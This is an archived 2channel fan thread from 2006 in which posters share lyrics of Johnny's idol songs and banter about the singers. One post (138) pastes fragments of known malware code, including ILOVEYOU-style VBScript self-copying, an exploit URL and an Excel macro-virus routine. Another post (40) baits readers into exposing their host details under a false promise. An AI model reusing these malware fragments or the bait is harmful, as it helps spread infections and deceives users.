2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【小文字】男前のメール【愛用】

1 :ユーが名無しネ:2006/02/05(日) 14:18:01
更新される度に思っていたんだが、男前のメールで必ずつく小文字。
男前といいながらも男前になっていない気がする。
そう思うのは自分だけ?
正直気持ち悪い。

2 :ユーが名無しネ:2006/02/05(日) 14:19:06
駄スレ

3 :ユーが名無しネ:2006/02/05(日) 16:39:43
>1
自分はどちらかというとテメェのようなゴミ付きのがよっぽど気持ち悪い

4 :ユーが名無しネ:2006/02/05(日) 16:46:55
(・_・|(・_・|(・_・|(・_・

5 ::2006/02/05(日) 16:59:36
age

6 :ユーが名無しネ:2006/02/05(日) 17:21:10
今回は可愛らしい安置だな
記念パピコ

7 :ユーが名無しネ:2006/02/05(日) 17:26:25
(・_・|(・_・|(・_・|(・_・

8 :ユーが名無しネ:2006/02/05(日) 17:57:15
ここはチンパと男前のメールについて他担が感想を語るスレ?

9 :ユーが名無しネ:2006/02/05(日) 18:02:36
>>8
担はだれでもいいよ
感想なのかはわからないけど

10 :ユーが名無しネ:2006/02/05(日) 18:05:54
(・_・|(・_・|(・_・|(・_・

11 :ユーが名無しネ:2006/02/05(日) 18:54:07
あの連載最初は微笑ましいとか思ったけど
今となっちゃあキモイだけだ

12 :ユーが名無しネ:2006/02/05(日) 19:16:42
チン男前とレンジャーを勘違いしてると思うが

13 :ユーが名無しネ:2006/02/05(日) 20:47:54
なんなんだろう、あの話し方…(書き方?)

14 :ユーが名無しネ:2006/03/23(木) 03:27:06
〜〜リサイクル〜〜

ここは今日から好きな
ジャニの曲の歌詞を書くスレに変更します

【遊び方】 @歌詞を書く
A歌手名(グループでもソロでもOK!)と曲名を書く

15 :ユーが名無しネ:2006/03/23(木) 03:33:03
好きだと言えば今にも
崩れそうで
伝えたいのに胸の奥にしまった
いつまで見守っていればいいの?
もう この気持ち我慢できない
伝えたらもう会えなくなるの?
指輪が邪魔をして言えない

「指輪」/P

16 :ユーが名無しネ:2006/03/23(木) 03:42:09
いつまでも君に甘えてばかりの僕じゃないと教えてあげる
fiesta say yaya
もっと楽しい事
fiesta say yaya
教えてあげるよ

fiesta/石鹸

17 :ユーが名無しネ:2006/03/23(木) 03:46:17
>14-16
逮捕されますよー

18 :ユーが名無しネ:2006/03/23(木) 03:50:09
目に入る光を受けて
一歩ずつ歩いてみるか

月を見上げてみる

彰/カラフル

19 :ユーが名無しネ:2006/03/23(木) 03:53:03
>17
されない
歌手名と曲名入れてるから
ファンサイトなんて書きまくりです

20 :ユーが名無しネ:2006/03/23(木) 04:04:09
じゃあ先に歌手名と曲名を書きましょ

田原俊彦/ザ・青春セイリング(1981年・名曲!)

セイリング セイリング彷徨う頃に
セイリング セイリング出会った恋は海に似てるね
抱けばかすかに甘い風


21 :ユーが名無しネ:2006/03/23(木) 05:52:21
>20
ここはjr板です

22 :ユーが名無しネ:2006/03/23(木) 07:52:19
>15
しかも歌詞間違ってるし

23 :ユーが名無しネ:2006/03/23(木) 18:44:07
須磨/Hi Fi

静まり返った夜の街〜

24 :ユーが名無しネ:2006/03/23(木) 18:51:30
須磨/雪が降ってきた

雪の降る街 一人で思い出と歩いた
静かに降る雪 手の平にそっと乗せて

僕の心に降る雪 いつか溶けるけれど
あんなに愛した君の笑顔忘れない

25 :ユーが名無しネ:2006/03/26(日) 01:33:59
デビルorエンジェル/石鹸
悪魔のようなその唇に罠と知りながらも触れたいよ〜(略)
それ程あなたが好きだよ

26 :ユーが名無しネ:2006/03/27(月) 01:58:48
↑自分もそれ好き

Devil or Engel/石鹸

約束のない夜が始まる
もう昨日に戻れない


27 :ユーが名無しネ:2006/03/27(月) 02:04:59
歌・石鹸

写真立ての君見るたびにどうしているのかと思うよ(略)
誰かの胸の中〜〜ぁぁぁぁぁ〜↑

28 :ユーが名無しネ:2006/03/30(木) 16:10:06
石鹸/浜天使

濡れた髪に触れた時
胸の奥ドキドキした
恋ゴコロ溢れてるよ
情熱止まらない

29 :ユーが名無しネ:2006/03/30(木) 16:19:18
2ネムで紹介したら著作権に引っかかるよ

30 :ユーが名無しネ:2006/03/31(金) 00:01:57
誘い月/NEWS

語り合う言葉を集めるより口吻を
いたずらに揺れる影
暗闇の中 白く溶ける
つのるほど せつなくてこんなにも惹かれあうなら

31 :ユーが名無しネ:2006/03/31(金) 00:05:17
誘い月、紺で聴くと感動する

32 :ユーが名無しネ:2006/03/31(金) 21:14:02
NEWS/明日へ

やり場のない この怒りを嘘つきだらけの大人にぶつけ
その度に少し胸が痛むけど 今はどうしていいか分からない
どこまでも続く先の見えない道
踏み出す勇気くれたのはあなたでした
Wow Wow.....

33 :ユーが名無しネ:2006/03/31(金) 21:23:16
Ya-Ya-yah/Just wanna lovin' you

重なったあの影を そっと瞳に閉じ込め
欲しがる気持ちに 嘘はつけない

34 :ユーが名無しネ:2006/03/31(金) 21:26:00
指輪/P

甘い薔薇の香りは
強いその眼差しは
僕をああ惹き付ける
君と重なる冬景色
その無邪気な笑顔はまるで
白いキャンバスなのに
細いその指先に光る指輪は誰から
特別な人はいないよ、なんて
信じたいけど
tonde hesta corazon

35 :ユーが名無しネ:2006/03/31(金) 21:31:22
NEWS/希望〜yell〜

南に向かう風に乗っかって まぶしい季節始まる勇気と希望 共に分け合って
そうさ僕と君と

36 :ユーが名無しネ:2006/03/31(金) 22:17:26
KAT-TUN/WILDS OF MY HEART

雨が二人の頬を伝い
世界の片隅で君と出逢った
いつかは果ててゆくこの命
出来るなら君と眠る

夜の暗闇に囲まれて
一人で傷ついた君の中に
確かな俺の未来感じた
いつまでも君を守る


この曲は歌詞もメロも大隙だ

37 :ユーが名無しネ:2006/04/02(日) 01:24:32
NEWS/Shock me

ギラギラ光る風
宙を舞う叫び
(略)
いまShock me

38 :ユーが名無しネ:2006/04/02(日) 01:29:25
NEWS/希望yell

一人じゃ恐くても
自信が持てない時も
思い出して あの日の約束を
フレーフレー君に僕から
フレーフレー贈りたいんだ

39 :ユーが名無しネ:2006/04/04(火) 22:57:40
Pの作った詞は切なくて、ちょっと哲学の香りのするのが多いな

40 :ユーが名無しネ:2006/04/05(水) 00:41:14
やばっ煤i゚д゚lll)今月金ないのに…


名前欄に!vipmoneyfusianasanで利用金額が出るよ(*´∀`*)


41 :ユーが名無しネ:2006/04/05(水) 01:21:47
P/Pain

一人で街を歩けば
冬の寒さが肌を刺すよ
人混み掻き分けながら
君の思い出かけめぐるよ

42 :ユーが名無しネ:2006/04/05(水) 01:27:24
P/Pain

ひらひら落ちる この雪のよに君への想い
降り積もってく
(略)
もう君は戻ってこない
他の誰かの腕の中

43 :ユーが名無しネ:2006/04/05(水) 04:00:26
P/Pain

もしも願いが叶うのならば
もう一度だけなんて言わないよ
せめて僕らが巡り会う前に戻してほしい
きっとこんな痛みはないから

44 :ユーが名無しネ:2006/04/05(水) 12:36:59
NEWS/TEPPENポポフ・バージョン

ポポフ見つめて
ポポフ感じて
熱いポポフ伝えるから

舞い上がれ空高く
地面蹴り付けろ

45 :ユーが名無しネ:2006/04/05(水) 15:55:58
関ジャニ∞/無限大

出会えたことが嬉しくて
何だか涙が溢れてく

心に元気無限大 大切な仲間

46 :ユーが名無しネ:2006/04/08(土) 18:26:36
NEWS/NANDE×2 DAME

夏の日差しを浴びて
揺れる想いにUp&Down
幼馴染の君へ 僕の想いよ届け

47 :ユーが名無しネ:2006/04/08(土) 18:34:29
(O^w^O)


48 :ユーが名無しネ:2006/04/08(土) 18:41:51
(^o°)☆彡
いい詞ばかりね!

49 :ユーが名無しネ:2006/04/08(土) 18:44:34
v(°O^)
そうね

50 :ユーが名無しネ:2006/04/08(土) 18:46:28
(゚レ゚ )す

51 :ユーが名無しネ:2006/04/09(日) 00:52:01
P誕生日おめでとう!!それじゃ今夜限りのスペシャルソング歌います

Happy Birthday,
So happy happy birthday...
Oh I wish beautiful days for you.

52 :ユーが名無しネ:2006/04/10(月) 23:46:18
タイトル不明(クロサギ主題歌)/P

抱いて抱いて抱いて
セニョリータ
強く強く強くセニョリータ
その唇がじれったいのよ

53 :ユーが名無しネ:2006/04/10(月) 23:50:57
↑タイトルは
「黄昏オラミゴス」みたいなラテン語がいい

54 :ユーが名無しネ:2006/04/11(火) 16:44:11
>52
タイトル発表された
「抱いてセニョリータ」

55 :ユーが名無しネ:2006/04/13(木) 00:55:15
>34
セニョリータのカップリングに指輪が決まりましたね

56 :ユーが名無しネ:2006/04/15(土) 20:07:51
抱いてセニョリータ/P

女なんて大人ぶって
ガキ扱い
もういい加減にしてくれ(略)
抱いて抱いて抱いてセニョリータ
強く強く強く離さないでその唇がじれったいのよ

57 :ユーが名無しネ:2006/04/15(土) 20:10:02
>53
ラテン語の希望は叶ったな

58 :ユーが名無しネ:2006/04/15(土) 21:57:01
うんこもれるぅもれるぅぅぅぅぅぅぅうんこぉぉぉ

59 :ユーが名無しネ:2006/04/15(土) 23:39:50
  

60 :ユーが名無しネ:2006/04/18(火) 08:49:08
http://12

61 :ユーが名無しネ:2006/04/20(木) 16:44:55
メールすげー

62 :ユーが名無しネ:2006/04/21(金) 03:31:30
○。・。○。・。○。・。○。・。○。・。○。・。○。・。○。・。○
このレスをみたあなたは・・・3日から7日に
ラッキーなことが起きるでしょう。片思いの人と両思いになったり
成績や順位が上ったりetc...でもこのレスをコピペして別々のスレに
5個貼り付けてください。貼り付けなかったら今あなたが1番起きて
ほしくないことが起きてしまうでしょう。
コピペするかしないかはあなた次第...
○。・。○。・。○。・。○。・。○。・。○。・。○。・。○。・。○

63 :ユーが名無しネ:2006/05/01(月) 18:25:22
石鹸ツアー大成功おめでとう!
最高のツアーだったよ!
頑張って内輪振ったじょ
「抱いてセニョリータ」/山下智久

喧嘩の傷跡ながめ貴女は言う
あいつとつるむのは
もうやめなと
分かってるって女なんて大人ぶってガキ扱い
もうやめにしてくれないか
抱いて抱いて抱いてセニョリータ
強く強く強く離さないで飾ってカッコつけずに
そばにおいでよ
抱いて抱いて抱いてセニョリータ
強く強く強くはなさないで
あなたのその唇がじれったいのよ

64 :ユーが名無しネ:2006/05/01(月) 18:39:50
ピー
その 抱いてセニョリータを
是非、目に聞かせてやってくれ

65 :ユーが名無しネ:2006/05/02(火) 15:20:18
「DREAMS」 '06SPRING TOUR オーラス・バージョン/NEWS

なぜ涙あふれるの?
言葉では言えない時
目の前にNEWSがいる
大丈夫だから信じて待ってろ

66 :ユーが名無しネ:2006/05/02(火) 15:29:05
「サヤエンドウ」'06 SPRING TOUR オーラス・バージョン/NEWS

海の真ん中 目覚めた 囲まれた
いかついドクロが おいらに怒鳴る
“NEWSのことを信じてろ!”
“NEWSのことを愛してろ!”
その瞬間 全てが動き出した
そうさ本物だったんだ

67 :(゜Д°):2006/05/02(火) 23:29:32
こんばちわっ
俺達のコンサートに来てくれてありがとうっ!
セニョリータもよろしくねっ!

68 :ユーが名無しネ:2006/05/02(火) 23:37:03
(^○^)(^O^)(^-^*)(^▽^)きゃーーー!!!
ポーサーーーーーーン!!
もう一回うたってぇぇぇ

69 :ユーが名無しネ:2006/05/05(金) 00:04:24
NEWS/NEWSニッポン

一人じゃないよWowWow...
近くにいるよWe are dreamer...
元気そして勇気もって駆け出そう

70 :ユーが名無しネ:2006/05/05(金) 22:39:56
歌手名と曲名入れたら大丈夫って
本気で思ってる?

71 :ユーが名無しネ:2006/05/06(土) 00:56:37
NEWS/きらめきの彼方へ
そう僕らの旅は決して勝ち負けじゃない
比べることばかりに
とらわれないで

72 :ユーが名無しネ:2006/05/06(土) 00:57:54
いい詩だな

73 :ユーが名無しネ:2006/05/07(日) 07:02:33
70が生きてて許されると本気で思ってる?

74 :ユーが名無しネ:2006/05/07(日) 14:10:53
NEWS/ずっと

星くずを散りばめた
空の下を歩いた帰り道
二人きり まだ少し ぎこちなくて 会話もとぎれがちだけど
つないだ手と手 つながる時間 君の言葉の一つ一つから つたわる想い 今にも泣きだしそうな瞳に できること

75 :ユーが名無しネ:2006/05/08(月) 21:26:38
いい歌、
紺でも、つい聴き入る

76 :ユーが名無しネ:2006/05/10(水) 00:47:25
(゜Д°
こんばちわっ


77 :ユーが名無しネ:2006/05/11(木) 03:45:54
熱いハートは君だけの
Shinning road
瞳 見つめて・・・
僕を 感じて・・・
熱い想い伝えるから

78 :ユーが名無しネ:2006/05/13(土) 00:34:19
↑タイトル忘れた

NEWS/TEPPEN

79 :ユーが名無しネ:2006/05/13(土) 15:41:07
TEPPEN好きなり
ポポフversionも好きw

80 :ユーが名無しネ:2006/05/13(土) 15:43:02
>79ちょっとでも草野関係の言葉はだすな!
思い出すだろ!!

81 :ユーが名無しネ:2006/05/13(土) 17:16:42
キモ厨スレあげ

82 :ユーが名無しネ:2006/05/13(土) 23:38:15
ポポフ ポポフ ポポフ(w
安置、Jr板ではソイエと呼ぼう
決まりだから

ポポフ見つめて
ポポフ感じて
熱いポポフ伝えるから

83 :ユーが名無しネ:2006/05/13(土) 23:44:59
(  ゜Д°)
こんばちわっ!
安置は無視して続けようよっ!
僕はこのスレ好きだよ

84 :ユーが名無しネ:2006/05/13(土) 23:47:17
>>83
ポーサンいらっしゃい

85 :ユーが名無しネ:2006/05/13(土) 23:50:29
                        _,,t-‐‐-、,-‐‐-、
                     三'::::::............... .....::::::`y,.
                     ナ::::::::::::::::::::::::::::::::: :::::::::::::ヾ
              | ̄|   V::::::::::::::::_{{ ({∫∬ノノjヾ:::::{
           | ̄| | ̄|   ナ::::::::::::::i`__,,,,,,,ァ_  _,,,,,_ t;;:ヌ
           |  | |  |  イヘ::::::(ヾ~!,ャt、 !'''i ィtン )=f }f
           |  | |  |  i {t)テ" ヘ' '___,イ ヽ_/ 介'
           |  | |  | _,rヘ_,j|!'     /ー--''!     |'   デスノート大好き♥
           |,.ィ―'''' ̄ /| |       /二ク     !      
           /;;:::'';;::''::;;:/ { ! 、     ヾニン   ノ\
            /'''::::;r|''':::;;;|  | ! \       _,,./|::;;'''\
        /:;;/ |;;;''::;;|   丶\  `__>-ー´   !;;;:'''::iヽ、
          i/   |'::;;;;''|      三 ―''"       !''::;;;;| /ヽ
        /⌒ヽ  |;;''':::;|       \            !;;::''|/  i
         /     \{'';;;::''}          ̄二ニ=    !::;;|   |
        /ヘ     |;;:::::;{            ‐-      !/   |
        /  i     |:::;;;''!             ー       !  / |

86 :ユーが名無しネ:2006/05/13(土) 23:54:28
NEWS/TEPPEN

マジでかっこいい奴は
いつも有言実行
君も恥ずかしがらずに
声に出してみなよ

87 :ユーが名無しネ:2006/05/17(水) 00:47:35
伝えた分だけ力がみなぎる
失敗は君が諦めた時さ
舞い上がれ空高く
誰にも負けない熱い気持ちで 揺らせ太陽
ためらわず 怖がらず
地面蹴り付けろ
君の想いは 華麗に宙を舞うから
TEPPEN目指せ

88 :ユーが名無しネ:2006/05/19(金) 18:51:09
(  ゜Д°)

こんばちわっ!
一足早くもう梅雨入りしちゃったね!
爽やかな夏が待ちどうしいよ!
歌詞書いてくれてるみんな、いつもお疲れサマー!


89 :ユーが名無しネ:2006/05/21(日) 02:41:49
q(*^o゜*)

いえいえ、そんな・・
お安いものですよ
セニョリータの2番いいですね

90 :ユーが名無しネ:2006/05/26(金) 01:13:41
ここは本当のMusicヲタがヒソーリ集うスレです

91 :ユーが名無しネ:2006/05/26(金) 01:20:06
Pソロの指輪とセニョリータ、Painあたりは80年代でも通用するサウンド



92 :ユーが名無しネ:2006/05/26(金) 19:32:59
このスレを見たあなたは一週間以内にとても幸運な事が起こるでしょう☆新しいお友達が出来たり素敵な恋人が出現したり(*^_^*)

☆彡あなたのハッピーを応援しています☆彡☆彡

93 :ユーが名無しネ:2006/05/27(土) 13:58:50
http://id6.fm-p.jp/141/orangeheart/

94 :ユーが名無しネ:2006/05/28(日) 01:35:21
哀愁でいと/田原俊彦

誰かに誘われ
君が乗り込むイエローGT
「愛してる」なんて疲れちまう
左であばよとドアに書き思い切り殴る
その日だけのセンセーション
心まで奪われたのか

95 :ユーが名無しネ:2006/05/28(日) 01:46:55
NEWS/裸足のシンデレラボーイ
流した涙は無駄にならないよ
あいつの声 思い出すWowWow
(略)
バスの扉が静かに開く
背中でつぶやく
Hasta la vista baby

96 :ユーが名無しネ:2006/05/28(日) 02:05:09
南回帰線 走る風が言った
君はIce cream jam
君はIce cream jam....
南回帰線 越える風が言った
そしてbe in love
そしてbe in love....

97 :ユーが名無しネ:2006/05/28(日) 22:51:43
(・_・|

当分P担は潜るしかないわよね

98 :ユーが名無しネ:2006/05/28(日) 22:53:20
(-_-)zz

アタシはしばらく寝ててみるわ

99 :ユーが名無しネ:2006/05/28(日) 23:02:40
サヤエンドウ・エマージェンシーVersion/P担

スレのほとんど あっと言う間に囲まれた笑
お前はいつまで寝てんだ!荒らしがウヨウヨ来てんジャン!


100 :ユーが名無しネ:2006/05/28(日) 23:31:00
>99
ワラタ

101 :ユーが名無しネ:2006/05/30(火) 01:39:09
Pスレの現状が歌になったか・・(w
じゃ自分もやる

その時やっと思い出した自分はロム派だったって
無数の迫る影
胸が騒いだ

ブラボブラボ
おいら達まるでサヤエンドウ
ブラボブラボ
かけがえのないワンピース!
ガンダラーダ ガンダラーダ
乗せられはしないさ
ガンダラーダ ガンダラーダ
影で安置を笑うから

そろそろ落ちなくちゃ
安置が回す
その前にさらば〜
仲間がそばにいる
何も恐くない

102 :ユーが名無しネ:2006/05/30(火) 18:30:58
>34
自己レス(w
スペイン語のスペルが違ってたスマソ

Donde esta corazon

103 :ユーが名無しネ:2006/05/30(火) 23:42:57
抱いてセニョリータ/山下智久
昔の男と俺を重ねては
ため息まじりで笑ってみせる
分かってるって男なんて信じてないと言いたいんだろう
もう楽にしてあげるから

104 :ユーが名無しネ:2006/05/31(水) 22:59:45
そんじゃ指輪出の自分が通りますよスタスタ笑

指輪/山下智久

今年も空から あぁ白い雪
降り積もるんだ 僕の心にそっと
この雪が溶けだす頃には君に気持ちを伝えられるかな?
こんなに弱い僕じゃダメだね
君がこの雪を溶かしてよ

105 :ユーが名無しネ:2006/05/31(水) 23:12:58
Spring,Summer,Autumn
and Winter and YOU!

Wow Wow 湾岸スキーヤー

106 :ユーが名無しネ:2006/05/31(水) 23:25:17
Pオリコンのデイリー1位おめでとう お祝いにジバンシーのスカーフ送ります



〜1位轣`

107 :ユーが名無しネ:2006/06/01(木) 17:08:48
ワラタ


108 :ユーが名無しネ:2006/06/01(木) 17:13:52
真冬のナガレボシ/NEWS

真冬のナガレボシが
遠くの空に瞬いた
それはちっぽけな残像

コメント:まだ音源化されてない名曲がいっぱい

109 :ユーが名無しネ:2006/06/01(木) 17:58:15
良スレあげ

110 :ユーが名無しネ:2006/06/01(木) 22:39:50
しろさぎさんからお手紙ついた
くろさぎさんたら読まずに食べた
し〜かたがないから
お〜手紙かいたー

今度の対決相手はだあれ?

111 :ユーが名無しネ:2006/06/02(金) 14:25:47
>105
NEWSもデビュー当時に紺で歌ってた少年隊の曲

112 :ユーが名無しネ:2006/06/02(金) 17:11:41
カラフル/山下智久

いくら探し続けても
答えなんてわからない
目に入る光を受けて
心のままに進むんだ
夜が明けてゆく

見えないものに立ち向かう 希望・勇気手に入れろ
明日へ続く道のりを 一歩ずつ踏み出してみる
未来に祈るように
月を見上げてみる
カラフルな世界へ


コメント:今朝5時前くらいまで街を歩いていた時、この歌と似た気持ちになった

113 :ユーが名無しネ:2006/06/02(金) 20:36:21
タモステ見たよ
>106姐さんのジバンシーが効いたのかPリベンジ出来てたな(w

なーんて誉めてはイケナイ(wあれは目が来るのに合わせてアミーゴのスカーフ巻いただけだお(o^w^o)
クスクス

114 :ユーが名無しネ:2006/06/02(金) 21:32:06
笑った
タヌキをはずしてたな笑
あれ、やっぱり歌いにくそう
Pリベンジ成功おめでと!

115 :ユーが名無しネ:2006/06/02(金) 21:49:40
それじゃPのリベンジ成功を祝してセニョもう一度!
抱いてセニョリータ/山下智久
喧嘩の傷跡を眺めあなたは言う
あいつとツルむのはもうやめなと
分かってるって女なんて大人ぶってガキ扱い
もうやめにしてくれないか
抱いて抱いて抱いてセニョリータ
強く強く強く離さないであなたのその唇がじれったいのよ

116 :ユーが名無しネ:2006/06/02(金) 22:44:43
Pリベンジよくやった〜〜!
今夜はここのMusicファンも喜んでるよ

117 :ユーが名無しネ:2006/06/03(土) 00:19:11
うぉぉーーPリベンジおめでとうダッチャ!
腰に巻いてたスカーフは
106チャンからの贈り物だったのか(w
自分も釣られてみた(w

よくやったよP
よくやった
よくやったーーー!

118 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/04(日) 19:45:29
LOVE SONG/山下智久

いま間違いに気付いても僕の過ちは消すことができない
君のこと思うと愛しさで胸が痛いよ
きっと君よりもいい人なんて もういない
今やっと気付いた


119 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/06(火) 11:01:33
P「抱いてセニョリータ」40万枚突破おめでとう!

大 勝 利

120 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/11(日) 22:27:38
>112
その歌は心が安らぐし何となく勇気がもらえる


121 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/17(土) 01:19:48
age

122 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/22(木) 03:17:23
age

123 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/26(月) 13:48:00
Love Song/山下智久

目が覚めて ふと 左を見ても
君がいるわけなんて
ないよね
(略)
「自分勝手でゴメンね
君がいなきゃ ダメだよ」と

124 :ポーサン:2006/06/26(月) 16:03:12
( ゚Д゜)久しぶりに来たらアテクシの歌詞スレに書き込み少ないじゃないのよ

125 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/26(月) 16:06:25
(^o^;ごめんねポーサン
色々あってしばらくカキコ出来なかったの

126 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/26(月) 16:11:02
☆彡(^_゚ )

127 :ポーサン:2006/06/26(月) 16:15:05
( ゚Д゚)別に無理に書いてくれなくたっていいわよ!

128 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/26(月) 16:58:24
p(^^)qいえいえ自主的に書きますわよ

Say Hello/NEWS
I LOVE YOU
君の本音を 君の心を
もっと知りたいんだ
風を 空を 花を 歌を そして君を愛するとこれから 僕ら始めよう

129 :ポーサン:2006/06/27(火) 00:49:01
( ゚Д゚)アンタなかなか可愛いとこ、あるじゃないの
いいわデビュー曲ヒット記念にアテクシのハイヒールで踏んであげる

130 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/27(火) 01:36:53
>129
(^O^)ポーサン、ドSの振りして本当はドM(ワラ
昔から指輪の歌詞みてるとそう思う

指輪/P
いつまで見守っていればいいの?
もう この気持ち我慢できない

131 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/27(火) 11:42:29
( ゚Д゚)I am irritating!
アテクシは焦らしプレイのポーよ!Mなわけないじゃない

132 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/27(火) 18:02:51
「I am irritating(俺は焦らしてるんだぜ)」
キターーー!

133 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/27(火) 18:08:50
NANDE×2DAME/NEWS

君を見ていると
心踊るよ
だから今度こそ
君に伝えたいよ

134 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/12(水) 01:14:03
チンパ上げ

135 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/19(水) 23:13:15
( ゚Д゚)ふ〜るさと〜のうーたーがー

136 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/19(水) 23:15:15
( ゚Д゚)き〜こえて〜
く〜るよな〜♪

137 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/20(木) 06:08:27
http://r.pic.to/6a5c5

138 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/23(日) 01:56:43
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


139 :ユーは名無しネ:2006/08/01(火) 00:59:36
削除候補2

140 :ユーは名無しネ:2006/08/03(木) 02:06:03
( ゚Д゚)あらっアタクシが一人でもガンガルわよっ!

141 :ポーサン:2006/08/03(木) 02:12:31
( ゚Д゚)このスレのことは一生アタクシが全力でお守りしますっ!

142 :ユーは名無しネ:2006/08/03(木) 02:13:31
ポー皇太子さま!!

143 :ユーは名無しネ:2006/08/03(木) 22:14:19
ポー皇太子(-人-)ナモナモ

144 :ユーは名無しネ:2006/08/06(日) 04:56:26
天にまします我らが神よアーメン!

145 :ユーは名無しネ:2006/08/06(日) 11:33:31
男前愛してる愛してない
アテクシ愛してる



146 :ユーは名無しネ:2006/08/06(日) 19:44:40
きよしこの夜
星は光り アーメン!

147 :ユーは名無しネ:2006/08/07(月) 13:27:58
************************* 重要なお知らせ **************************

※ジャニーズ2板、ジャニーズJr板合同のお知らせです
※告知に協力お願いします

先日住み分けが決定しましたが未だ板違いのスレがあります
そういうスレは以下のどちらかの方法を選んで実行して下さい

  1、8月15日24時までに使い切れそうなところ、使い切れないが引越しをしたい
    というところは正しい板に次スレを立てて誘導して引越して下さい
    使い切れない現行スレは倉庫落ち依頼をします
    (※無理な埋め立て行為は禁止です)

  2、8月15日24時までに引越ししていないスレは移動で依頼を出します
    移動の場合現行スレをそのまま使って下さい
    処理されるまで時間がかかるかもしれません
   
  ◎本スレ安置スレについて◎
   それぞれ1つに絞って決めて重複スレは誘導して下さい
   誘導を貼っていない重複スレは自治の判断で誘導します

候補となるスレは自治でまとめていますが全部は把握できないので
まとめスレを確認しそれぞれ責任を持って申告して下さい
倉庫落ち依頼及び移動依頼は自治でまとめて出します

詳しくはジャニーズ2板自治スレで
http://tv7.2ch.net/test/read.cgi/jr/1152149008/

********************************************************************

148 :ユーは名無しネ:2006/08/13(日) 19:52:14
ポーサン自分でMって言ってたじゃん
本当ツンデレだなポーサン

149 :ユーは名無しネ:2006/08/13(日) 23:02:32
( ゚Д゚)世界バレーのポーですっ!

150 :ユーは名無しネ:2006/08/13(日) 23:04:21
( ゚Д゚)じゃ、なかったワールドグランプリのポーです!

151 :ユーは名無しネ:2006/08/13(日) 23:06:35
ポーサンまだ間違ってる笑「世界のポー」だよ(コソ

152 :ユーは名無しネ:2006/08/13(日) 23:10:04
( ゜ Д゚)

153 :ユーは名無しネ:2006/08/13(日) 23:10:47
( ゚Д゚)あ・・そうだった

( ゚Д゚)せ・・世界のポーですっ!!

154 :ユーは名無しネ:2006/08/13(日) 23:14:05
でもWGPも頑張ってね

155 :ユーは名無しネ:2006/08/15(火) 22:53:41
やっぱり此処が一番落ち着くな

NEWS/チェリッシュ

見つめるたびに恋
感じたまま瞳
覗きたくて 素直になって ココで待ってるのさ


156 :ユーは名無しネ:2006/09/11(月) 01:35:54
「星屑のスパンコール」
一番好きなジャケットで気紛れに歩けば
知らない街 知らない顔 知らない夜
街角で肩が触れて 始まる物語 サングラスを外した時 驚く君

迷い込んだDISCOの人ごみなら 誰も僕に気が付きはしない だから

星屑のスパンコール ちりばめたON STAGE
この想い歌にのせ きみに贈るよ
もう一度アンコール もう一度アンコール またいつか会えるよね SEE YOU AGAIN
SEE YOU AGAIN
SEE YOU AGAIN

157 :ユーは名無しネ:2006/09/11(月) 01:40:14
なんてロマンチックな歌。。。


158 :ユーは名無しネ:2006/12/23(土) 01:39:54
>156
その歌、自分も好き
いいよね



28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)